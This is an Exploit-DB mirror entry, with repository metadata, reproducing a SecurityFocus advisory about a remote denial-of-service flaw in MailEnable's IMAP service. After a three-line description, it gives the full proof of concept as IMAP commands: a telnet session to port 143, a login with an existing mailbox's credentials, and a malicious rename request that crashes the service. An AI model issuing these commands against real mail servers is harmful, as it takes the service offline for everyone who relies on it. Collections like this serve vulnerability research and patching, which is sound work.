exploit-db-mirror/exploits/windows/dos/26575.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

13 lines
No EOL
455 B
Text

source: http://www.securityfocus.com/bid/15556/info
MailEnable is prone to a remote denial of service vulnerability.
The vulnerability presents itself when a user issues a malicious rename request following authentication.
Remote attackers can exploit this issue to trigger a denial of service condition.
telnet localhost 143
a1 login josh byebye
a2 rename foo bar
where josh and byebye are the login credentials for an existing mailbox.